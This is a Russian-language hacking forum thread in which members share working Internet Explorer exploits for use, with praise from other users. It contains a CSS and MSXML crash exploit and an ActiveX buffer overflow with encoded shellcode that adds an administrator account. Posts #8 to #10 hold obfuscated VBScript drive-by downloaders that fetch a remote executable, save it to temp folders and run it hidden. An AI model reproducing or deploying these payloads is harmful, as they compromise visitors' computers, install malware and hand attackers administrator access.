Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor


[ Internet Explorer ]


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 18

#1
Denis---Player

Denis---Player

    Байт

  • Members
  • Pip
  • 90 сообщений
Программа: Internet Explorer

Удаленный нападающий может вызвать отказ в обслуживании.

Эксплоит:

<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>

#2
Black-Elf

Black-Elf

    Кидала

  • Banned
  • Pip
  • 111 сообщений

Цитата

<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>

Классная фиговина, за что и получил +1...Побольше бы таких людей, которые будут выкладывать что лиюо подобное.
РЕСПЕКТ

#3
FaLL3N

FaLL3N

    Бит

  • Advanced
  • 17 сообщений
2 Black-Elf
+1
хммм?? помойму этого стаффа полно на милворме...

Интерестно, ты за метасплоит фреймворк +10 дашь?

#4
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
remote buffer overflow exploit / XP SP2 it version

При успешной эксплуатации создает нового пользователя и помещает его в группу администраторов.

<HTML>
<OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT>
<script language='vbscript'>

'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49
%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50
%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42
%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47
%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43
%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38
%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d
%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55
%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b
%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62
%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46
%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31
%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43
%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68
%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62
%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d
%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41
%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30
%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31
%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32
%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57
%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73
%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65
%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42
%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32
%41%61%74%71%74%35%50%44") + NOP
NOP= String(12, unescape("%90"))
EIP= unescape("%03%78%41%7e") 'call ESP user32.dll

SunTzu=String(272, "A") + EIP + NOP + SCODE

BaseRunner.Send485CMD SunTzu

</script>
</HTML>


#5
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Цель: Internet Explorer 6

Воздействие: Отказ в обслуживании

Код эксплоита:
<html>
<body>
<script language="javascript">
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.loadXML("<dummy></dummy>");
var txt = xmlDoc.createTextNode("huh");
var out = txt.substringData(1,0x7fffffff);
</script>
</body>
</html>
Описание уязвимости:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за ошибки при обработке входных данных в Microsoft XML Core Services. Удаленный пользователь может помощью специально сформированного Web сайта или email сообщения выполнить произвольный код на целевой системе.

URL производителя: www.microsoft.com
Решение: Установите последнюю версию с сайта производителя.

#6
FreeCat

FreeCat

    Invisible Admin

  • root
  • PipPipPipPipPip
  • 1236 сообщений
$iD
Интересно, помнит кто-нибудь ещё о простейшем "эксплойте" для модемщиков :P ???

#7
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
FreeCat
Возможно, а возможно и нет ;)

#8
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
IE 6 Exploit.
<script language="VBScript"> 
On Error Resume Next 

exe="http://www.[Your Patch Link ].com" 
x1="o"&"bj"&"e"&"ct" 
x2="cls"&"id:BD9"&"6C5"&"56-6"&"5"&"A3-1"&"1D"&"0-98"&"3"&"A-00"&"C0"&"4F"&"C2"&"9E36" 
x3="c"&"la"&"ss"&"id" 
x4="Mic"&"roso"&"ft.XM"&"LHT"&"TP" 
x5="Ad"&"od"&"b.St"&"r"&"eam" 
x6="G"&"ET" 
x7="Scr"&"ip"&"ting.Fil"&"eS"&"yst"&"emO"&"bject" 
x8="She"&"ll.A"&"ppl"&"icati"&"on" 

Set zhu3 = document.createElement(x1) 
zhu3.SetAttribute x3, x2 
XMLHTTP=x4 
Set x = zhu3.CreateObject(XMLHTTP,"") 
D5=x5 
D6=D5 
Set S = zhu3.CreateObject(D6,"") 
S.type = 1 
zhu32="GET" 
x.Open zhu32, exe, False 
x.Send 
fname1="google.pif" 
Set F = zhu3.CreateObject("Scripting.FileSystemObject","") 
Set tmp = F.GetSpecialFolder(2) 
fname1= F.BuildPath(tmp,fname1) 
S.open 
S.write x.responseBody 
S.savetofile fname1,2 
S.close 
Set Q = zhu3.CreateObject("Shell.Application","") 
Q.ShellExecute fname1,"","","open",0 
</script> 
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script> 
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">


#9
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
IE7 Exploit
<html>
<head>
<title>ProLogic.ws</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6

str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="www.zf4.com.exe"
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject","")
if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
fname1= F.BuildPath(tmp,"\svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>


#10
XaCeRoC

XaCeRoC

    Бит

  • Members
  • 1 сообщений

Просмотр сообщения$iD (15.2.2008, 20:21) писал:

IE7 Exploit
<html>
<head>
<title>ProLogic.ws</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6

str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="www.zf4.com.exe"
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject","")
if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
fname1= F.BuildPath(tmp,"\svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>

это всё под IE6.

#11
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
XaCeRoC
Ты уверен? <_<

Ссылки из под хайдов не выдаю!


#12
4665996

4665996

    Бит

  • Members
  • 1 сообщений

Просмотр сообщенияDenis---Player (10.12.2006, 19:32) писал:

Программа: Internet Explorer

Удаленный нападающий может вызвать отказ в обслуживании.

Эксплоит:

<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>

+1 кул респект)

#13
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit 0day

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
Тот же самый эксплойт, только под висту ;)

MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)


#14
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
]]>MS Internet Explorer 7 Memory Corruption PoC (MS09-002)]]>

#15
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений

Ссылки из под хайдов не выдаю!


#16
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
]]>MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)]]>

Ссылки из под хайдов не выдаю!


#17
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit

Ссылки из под хайдов не выдаю!


#18
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Уязвимость MS Internet Explorer 8.0.7100.0
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных при обработке HTML страниц. Атакующий может обманным образом заманить пользователя на специально составленный сайт, что приведет к отказу системы в обслуживании.

Ссылки из под хайдов не выдаю!


#19
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit

Ссылки из под хайдов не выдаю!



Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных